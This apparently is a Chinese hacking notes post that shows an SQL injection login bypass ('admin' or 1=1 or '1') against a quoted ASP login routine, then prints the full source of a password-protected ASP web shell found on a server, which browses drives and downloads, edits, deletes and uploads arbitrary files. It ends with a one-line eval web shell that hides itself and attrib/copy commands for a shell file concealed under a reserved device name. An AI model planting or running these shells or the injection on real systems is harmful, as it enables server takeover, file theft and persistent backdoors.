拿到某源码的SQL入侵思路

pwd = request.form("pwd")
name = request.form("name")
Set rs = Server.CreateObject("ADODB.Connection")
sql = "select * from Manage_User where UserName='" & name & "' And PassWord='"&encrypt(pwd)&"'"
Set rs = conn.Execute(sql)
If Not rs.EOF = True Then
Session("Name") =  rs("UserName")
Session("pwd") =  rs("PassWord")

另外判断用户是否登录判断的是SESSION

看起来似乎直接SQL注入即可,’or ‘1’=’1,其实不行,虽然结果为真,但是无法登录,因为还判断了SESSION中的名字,所以要   admin’ or 1=1 or ‘1 ,这样输入的用户名就是admin了。而且返回为真。登录成功

 

从一台服务器上找到的一个后门程序(文件上传)

<%@LANGUAGE=VBScript  codepage ="936"%>
<%Server.ScriptTimeOut=6000%>
<object runat=server id=SSyss scope=page classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></object>
<%on error resume next
dim Data_xlsf
Class upload_xlsf
dim oForm,objFile,Version
Public function Form(sForm)
sForm=lcase(sForm)
if not oForm.exists(sForm) then
Form=""
else
Form=oForm(sForm)
end if
end function
Public function File(strFile)
strFile=lcase(strFile)
if not objFile.exists(strFile) then
set File=new FileInfo
else
set File=objFile(strFile)
end if
end function
Private Sub Class_Initialize 
dim RequestData,sStart,vbCrlf,sInfo,iInfoStart,iInfoEnd,tStream,iStart,theFile
dim iFileSize,sFilePath,sFileType,sFormValue,sFileName
dim iFindStart,iFindEnd
dim iFormStart,iFormEnd,sFormName
Version="xiaolu"
set oForm=Server.CreateObject("Scripting.Dictionary")
set objFile=Server.CreateObject("Scripting.Dictionary")
if Request.TotalBytes<1 then Exit Sub
set tStream = Server.CreateObject("adodb.stream")
set Data_xlsf = Server.CreateObject("adodb.stream")
Data_xlsf.Type = 1
Data_xlsf.Mode =3
Data_xlsf.Open
Data_xlsf.Write  Request.BinaryRead(Request.TotalBytes)
Data_xlsf.Position=0
RequestData =Data_xlsf.Read
iFormStart = 1
iFormEnd = LenB(RequestData)
vbCrlf = chrB(13) & chrB(10)
sStart = MidB(RequestData,1, InStrB(iFormStart,RequestData,vbCrlf)-1)
iStart = LenB (sStart)
iFormStart=iFormStart+iStart+1
while (iFormStart + 10) < iFormEnd 
iInfoEnd = InStrB(iFormStart,RequestData,vbCrlf & vbCrlf)+3
tStream.Type = 1
tStream.Mode =3
tStream.Open
Data_xlsf.Position = iFormStart
Data_xlsf.CopyTo tStream,iInfoEnd-iFormStart
tStream.Position = 0
tStream.Type = 2
tStream.Charset ="gb2312"
sInfo = tStream.ReadText
tStream.Close
iFormStart = InStrB(iInfoEnd,RequestData,sStart)
iFindStart = InStr(22,sInfo,"name=""",1)+6
iFindEnd = InStr(iFindStart,sInfo,"""",1)
sFormName = lcase(Mid (sinfo,iFindStart,iFindEnd-iFindStart))
if InStr (45,sInfo,"filename=""",1) > 0 then
set theFile=new FileInfo
iFindStart = InStr(iFindEnd,sInfo,"filename=""",1)+10
iFindEnd = InStr(iFindStart,sInfo,"""",1)
sFileName = Mid (sinfo,iFindStart,iFindEnd-iFindStart)
theFile.FileName=getFileName(sFileName)
theFile.FilePath=getFilePath(sFileName)
iFindStart = InStr(iFindEnd,sInfo,"Content-Type: ",1)+14
iFindEnd = InStr(iFindStart,sInfo,vbCr)
theFile.FileType =Mid (sinfo,iFindStart,iFindEnd-iFindStart)
theFile.FileStart =iInfoEnd
theFile.FileSize = iFormStart -iInfoEnd -3
theFile.FormName=sFormName
if not objFile.Exists(sFormName) then
objFile.add sFormName,theFile
end if
else
tStream.Type =1
tStream.Mode =3
tStream.Open
Data_xlsf.Position = iInfoEnd 
Data_xlsf.CopyTo tStream,iFormStart-iInfoEnd-3
tStream.Position = 0
tStream.Type = 2
tStream.Charset ="gb2312"
sFormValue = tStream.ReadText 
tStream.Close
if oForm.Exists(sFormName) then
oForm(sFormName)=oForm(sFormName)&", "&sFormValue		  
else
oForm.Add sFormName,sFormValue
end if
end if
iFormStart=iFormStart+iStart+1
wend
RequestData=""
set tStream =nothing
End Sub
Private Sub Class_Terminate  
if Request.TotalBytes>0 then
oForm.RemoveAll
objFile.RemoveAll
set oForm=nothing
set objFile=nothing
Data_xlsf.Close
set Data_xlsf =nothing
end if
End Sub
Private function GetFilePath(FullPath)
If FullPath <> "" Then
GetFilePath = left(FullPath,InStrRev(FullPath, "\"))
Else
GetFilePath = ""
End If
End  function
Private function GetFileName(FullPath)
If FullPath <> "" Then
GetFileName = mid(FullPath,InStrRev(FullPath, "\")+1)
Else
GetFileName = ""
End If
End  function
End Class
Class FileInfo
dim FormName,FileName,FilePath,FileSize,FileType,FileStart
Private Sub Class_Initialize 
FileName = ""
FilePath = ""
FileSize = 0
FileStart= 0
FormName = ""
FileType = ""
End Sub
Public function SaveAs(FullPath)
dim dr,ErrorChar,i
SaveAs=true
if trim(fullpath)="" or FileStart=0 or FileName="" or right(fullpath,1)="/" then exit function
set dr=CreateObject("Adodb.Stream")
dr.Mode=3
dr.Type=1
dr.Open
Data_xlsf.position=FileStart
Data_xlsf.copyto dr,FileSize
dr.SaveToFile FullPath,2
dr.Close
set dr=nothing 
SaveAs=false
end function
End Class
httpt = Request.ServerVariables("server_name")
rseb=Request.ServerVariables("SCRIPT_NAME")
d=request("d")
if Request.Cookies("password")<>"angel" then 
if trim(request.form("password"))="angel" then 
response.cookies("password")="angel123" 
response.redirect rseb & "?d=ls.asp"
else 
%>
<form method="POST" action="">
Password:<input type="password" name="password"> 
<input type="submit" value="LOGIN" name="B1">
</form>
<%
end if
response.end
end if 
select case d
case "d.asp"
call downloadFile(request("path"))
function downloadFile(strFile)
strFilename = strFile
Response.Buffer = True
Response.Clear%>
<object runat=server id=s scope=page classid="clsid:00000566-0000-0010-8000-00AA006D2EA4"></object>
<%s.Open
s.Type = 1
if not SSyss.FileExists(strFilename) then
Response.Write("<h1>Error:</h1>" & strFilename & " does not exist<p>")
Response.End
end if
Set f = SSyss.GetFile(strFilename)
intFilelength = f.size
s.LoadFromFile(strFilename)
if err then
Response.Write("<h1>Error: </h1>" & err.Description & "<p>")
Response.End
end if
Response.AddHeader "Content-Disposition", "attachment; filename=" & f.name
Response.AddHeader "Content-Length", intFilelength
Response.CharSet = "UTF-8"
Response.ContentType = "application/octet-stream"
Response.BinaryWrite s.Read
Response.Flush
s.Close
Set s = Nothing
response.end
End Function 
case "ls.asp"
urlpath=server.urlencode(path)
dim cpath,lpath
if Request("path")="" then
lpath="/"
else
lpath=Request("path")&"/"
end if
if Request("attrib")="true" then
cpath=replace(lpath,"/","\")
attrib="true"
else
cpath=Server.MapPath(lpath)
attrib=""
end if
Sub GetFolder()
dim theFolder,theSubFolders
if SSyss.FolderExists(cpath)then
Set theFolder=SSyss.GetFolder(cpath)
Set theSubFolders=theFolder.SubFolders
Response.write"<a href='" & rseb & "?d=ls.asp&path="&Request("oldpath")&"&attrib="&attrib&"'>上级目录</a><br><script language=vbscript>"
For Each x In theSubFolders
%>so "<%=lpath%>","<%=x.Name%>","<%=request("path")%>","<%=attrib%>"
<%Next%>
</script>
<%
end if
End Sub
Sub GetFile()
dim theFiles
if SSyss.FolderExists(cpath)then
Set theFolder=SSyss.GetFolder(cpath)
Set theFiles=theFolder.Files
Response.write"<table border='0' width='100%' cellpadding='0'><script language=vbscript>" 
For Each x In theFiles
if Request("attrib")="true" then
showstring=x.Name
else
showstring=x.Name
end if%>sf "<%=showstring%>","<%=x.size%>","<%=x.type%>","<%=x.Attributes%>","<%=x.DateLastModified%>","<%=lpath%>","<%=x.name%>","<%=attrib%>","<%=x.name%>"
<% 
Next
end if
Response.write"</script></table>"
End Sub
%>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title><%=httpt%></title>
<style type="text/css">
<!--
body{font-size: 12px }
a{font-size: 12px; color: rgb(0,32,64); text-decoration: none }
a:hover{color: rgb(255,0,0); text-decoration: none }
a:visited{ color: rgb(128,0,0) }
td{font-size: 12px; line-height: 140%;}
a{color: #000000; text-decoration: none}
a:hover {text-decoration: underline}
-->
</style>
</head>
<script language="JavaScript">
function crf(ls)
{if (ls==""){alert("name?");}
else {window.open("<%=rseb%>?d=e.asp&attrib=<%=request("attrib")%>&creat=yes&path=<%=lpath%>"+ls);}
return false;
}
function crd(ls)
{if (ls==""){alert("name?");}
else {window.open("<%=rseb%>?d=edir.asp&attrib=<%=request("attrib")%>&op=creat&path=<%=lpath%>"+ls);}
return false;
}
</script>
<script language="vbscript">
sub sf(showstring,size,type1,Attributes,DateLastModified,lpath,xname,attrib,name)
document.write "<tr onMouseOver=""this.style.backgroundColor = '#C6CDDF'"" onMouseOut=""this.style.backgroundColor='#E8F3FF'""><td width='40%'><a href='"& urlpath & lpath & xName &"' target='_blank' title='Type:" & type1 & chr(10) & "Attri:" & Attributes & chr(10) & "Time:" & DateLastModified &"'><strong>" & showstring & "</strong></a></td><td width='15%' align='right'>"& left(DateLastModified,10) &"</td><td width='20%' align='right'>" & size & "b</td><td width='25%' align='right'><a href='<%=rseb%>?d=e.asp&path=" & lpath & xName & "&attrib=" & attrib &"' target='_blank' >编辑</a>|<a href="&chr(34)&"javascript: rmd1('"& lpath & xName &"')"&chr(34)&">删除</a>|<a href='#' onclick=cfile('" & lpath & Name & "')>复制</a>|<a href='<%=rseb%>?d=d.asp&path=<%=cpath%>\"&xName&"&attrib=" & attrib &"' target='_blank'>下载</a></td></tr>"
end sub
sub so(lpath,xName,path,attrib)
document.write "<a href='<%=rseb%>?d=ls.asp&path="& lpath & xName & "&oldpath=" & path & "&attrib=" & attrib &"'>" & xName &"</a> <a href="&chr(34)&"javascript: rmd('"& lpath & xName &"')"&chr(34)&">删除</a><br>"
end sub
sub rmd1(ls)
if confirm("Really del:"&ls)   then
window.open("<%=rseb%>?d=e.asp&path=" & ls & "&op=del&attrib=<%=request("attrib")%>")
end if
end sub
sub rmd(ls)
if confirm("Really del:"&ls)   then
window.open("<%=rseb%>?d=edir.asp&path="&ls&"&op=del&attrib=<%=request("attrib")%>")
end if
end sub
sub cfile(sfile)
dfile=InputBox("Copy"&Chr(13)&Chr(10)&"file:"&sfile&Chr(13)&Chr(10)&"Input file name:")
dfile=trim(dfile)
attrib="<%=request("attrib")%>"
if dfile<>"" then 
if InStr(dfile,":") or InStr(dfile,"/")=1 then
lp=""
if InStr(dfile,":") and attrib<>"true" then
alert "Path mode error:"&dfile
exit sub
end if
else
lp="<%=lpath%>"
end if
window.open("<%=rseb%>?d=e.asp&path="+sfile+"&op=copy&attrib="+attrib+"&dpath="+lp+dfile)
else
alert"name?"
end If
end sub
</script>
<body>
<table border="1" width="770" cellpadding="4" bordercolorlight="#999999" bordercolordark="#FFFFFF" align="center" cellspacing="0">
<tr>
<td bgcolor="#C8E3FF" colspan="2" align="center"><b><%=httpt%></b></td>
</tr>
<tr>
<td bgcolor="#EEEEEE" colspan="2">
<%For Each thing in SSyss.Drives
Response.write "[<a href='" & rseb & "?d=ls.asp&path="&thing.DriveLetter&":&attrib=true'>"&thing.DriveLetter&":</a>]"
NEXT
set oScriptNet=Server.CreateObject("WS"+"cri"+"pt.Ne"+"twork")
%> User:<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %></td>
</tr>
<tr>
<td bgcolor="#EEEEEE" colspan="2">
<%if Request("attrib")="true"  then
response.write "<a href='" & rseb & "?d=ls.asp'>切换到绝对路径</a>"
else
response.write "<a href='" & rseb & "?attrib=true&d=ls.asp'>切换到相对路径</a>"
end if
%>  Rpath:<%=cpath%> | CDir:<%=lpath%></td>
</tr>
<form name="form1" method="post" action="<%=rseb%>?d=up.asp" target="_blank" enctype="multipart/form-data">
<tr><td bgcolor="#EEEEEE" colspan="2">
<input type="text" name="fname" size="20">
<input type="button" value="建文件" onClick="crf(form1.fname.value)">
<input type="button" value="建目录" onClick="crd(form1.fname.value)">
<input type="file" name="file1" style="width:150" value="">
<input type="text" name="filepath" value="<%=cpath%>">
<input type="hidden" name="act" value="upload">
<input type="hidden" name="upcount" value="1">
<input type="submit" value="上传">
</td>
</tr></form>
<tr>
<td width="180" valign="top" bgcolor="#DFEFFF"><%Call GetFolder()%>
</td>
<td width="590" valign="top" bgcolor="#E8F3FF"><%Call GetFile()%>
</td>
</tr>
</table>
<p align="center">Modified by 安静</p>
</body>
</html>
<%case "e.asp"%>
<html>
<head>
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=gb2312">
<title>edit</title>
<style>
<!--
table{font-size: 12px}
a{font-size: 12px; color: rgb(0,32,64); text-decoration: none }
a:hover{color: rgb(255,0,0); text-decoration: underline }
a:visited{color: rgb(128,0,0) }
-->
</style>
</head>
<body>
<%if request("op")="del"  then
if Request("attrib")="true" then
wfile=Request("path")
else
wfile=server.mappath(Request("path"))
end if 
Set thisfile = SSyss.GetFile(wfile)
thisfile.Delete True
Response.write "<script>alert('Del succ!');window.close();</script>"
else
if request("op")="copy" then
if Request("attrib")="true" then
wfile=Request("path")
dsfile=Request("dpath")
else
wfile=server.mappath(Request("path"))
dsfile=Server.MapPath(Request("dpath"))
end if 
Set thisfile = SSyss.GetFile(wfile)
thisfile.copy dsfile
%>
<script language=vbscript>
msgbox "File:<%=wfile%>" & vbcrlf & "to:<%=dsfile%>" & vbcrlf & "Copy succ!"
window.close()
</script>
<%
else
if request.form("text")="" then
if Request("creat")<>"yes" then
if Request("attrib")="true" then
wfile=Request("path")
else
wfile=server.mappath(Request("path"))
end if 
Set thisfile = SSyss.OpenTextFile(wfile, 1, False)
counter=0
thisline=thisfile.readall
thisfile.Close
set fs=nothing
end if
%>
<form method="POST" action="<%=rseb%>?d=e.asp">
<input type="hidden" name="attrib" value="<%=Request("attrib")%>">
<table border="0" width="760" cellpadding="0" align="center">
<tr>
<td width="100%">File:<input type="text" name="path" size="45" value="<%=Request("path")%>"> <input type="submit" value="Save" name="B1"><input type="reset" value="Reset" name="B2"></td>
</tr>
<tr>
<td width="100%"><textarea rows="30" name="text" cols="104"><%=editfilecontent(thisline)%></textarea></td>
</tr>
</table>
</form>
<%else
if Request("attrib")="true" then
wfile=Request("path")
else
wfile=server.mappath(Request("path"))
end if 
Set outfile=SSyss.CreateTextFile(wfile)
outfile.WriteLine Request("text")
utfile.close 
set fs=nothing
Response.write "<script>alert('Edit succ!');window.close();</script>"
end if
end if
end if
%>
</body>
</html>
<%case "edir.asp"
if request("op")="del"  then
if Request("attrib")="true" then
wdir=Request("path")
else
wdir=server.mappath(Request("path"))
end if 
SSyss.DeleteFolder wdir,True
Response.write "<script>alert('Del dir:" & replace(wdir,"\","\\") & " Succ!');window.close();</script>"
else
if request("op")="creat"  then
if Request("attrib")="true" then
wdir=Request("path")
else
wdir=server.mappath(Request("path"))
end if 
SSyss.CreateFolder wdir
Response.write "<script>alert('Create Dir:" & replace(wdir,"\","\\") & " succ!');window.close();</script>"
end if
end if
case "up.asp"
set upload=new upload_xlsf
if upload.form("filepath")="" then
HtmEnd "Input up path!"
set upload=nothing
response.end
else
formPath=upload.form("filepath")
if right(formPath,1)<>"/" then formPath=formPath&"/" 
end if
for each formName in upload.objFile
set file=upload.file(formName)
if file.FileSize>0 then
file.SaveAs formPath & file.FileName
response.write file.FilePath&file.FileName&" ("&file.FileSize&") => "&formPath&File.FileName&" Succ!<br>"
end if
set file=nothing
next
set upload=nothing
sub HtmEnd(Msg)
set upload=nothing
Response.write "UP Succ!"
response.end
end sub
%>
<%
end select
function outcmd(Re)
Re = Replace(Re," "," ") 
Re = Replace(Re,"<","<") 
Re = Replace(Re,">",">") 
Re = Replace(Re,chr(13),"<br>")
outcmd=re
end function
function editfilecontent(Re)
Re = Replace(Re,"<","<") 
Re = Replace(Re,">",">") 
editfilecontent=re
end function
%>
</body>
</html>

从一台被黑的服务器上提取的一长句话

<%Eval(Request(chr(112))):Set fso=CreateObject("Scripting.FileSystemObject"):Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED")):if  f.attributes <> 39 then:f.attributes = 39:end if%>

不懂ASP,暂时先放到这里存着吧

<%Eval(Request(chr(112))):Set fso=CreateObject("Scripting.FileSystemObject"):Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED")):if  f.attributes <> 39 then:f.attributes = 39:end if%>

木马

attrib \\.\D:\\lpt8.ul.asp  -r -s -h 属性处理

copy \\.\D:\\lpt8.ul.asp 1.txt